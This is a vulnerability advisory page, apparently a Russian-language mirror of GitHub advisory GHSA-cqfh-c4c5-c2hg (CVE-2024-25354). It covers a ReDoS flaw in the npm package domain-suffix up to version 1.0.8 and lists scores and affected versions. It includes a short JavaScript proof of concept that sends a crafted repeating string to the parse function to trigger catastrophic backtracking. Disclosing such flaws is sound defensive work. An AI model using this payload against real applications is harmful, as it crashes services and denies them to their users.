GHSA-cqfh-c4c5-c2hg

Опубликовано: 28 мар. 2024

Источник: github

Github: Прошло ревью

CVSS4: 8.7

CVSS3: 7.5

Описание

domain-suffix RegEx Denial of Service

RegEx Denial of Service in domain-suffix 1.0.8 allows attackers to crash the application via crafted input to the parse function.

PoC

async function exploit() { const domainsuffix = require(\"domain-suffix\"); // Crafting a string that will cause excessive backtracking const maliciousInput = \"a.\".repeat(10000) + \"b\"; // This will create a long sequence of \"a.\" followed by \"b\" const result = await domainsuffix.domainSuffix.parse(maliciousInput); } await exploit();

Ссылки

Пакеты

Наименование

domain-suffix

npm

Затронутые версииВерсия исправления

<= 1.0.8

Отсутствует

EPSS

Процентиль: 36%

0.00151

Низкий

8.7 High

CVSS4

7.5 High

CVSS3

CVE ID

CVE-2024-25354

Дефекты

CWE-1333

Связанные уязвимости

CVE-2024-25354

CVSS3: 7.5

nvd

почти 2 года назад

RegEx Denial of Service in domain-suffix 1.0.8 allows attackers to crash the application via crafted input to the parse function.

EPSS

Процентиль: 36%

0.00151

Низкий

8.7 High

CVSS4

7.5 High

CVSS3

CVE ID

CVE-2024-25354

Дефекты

CWE-1333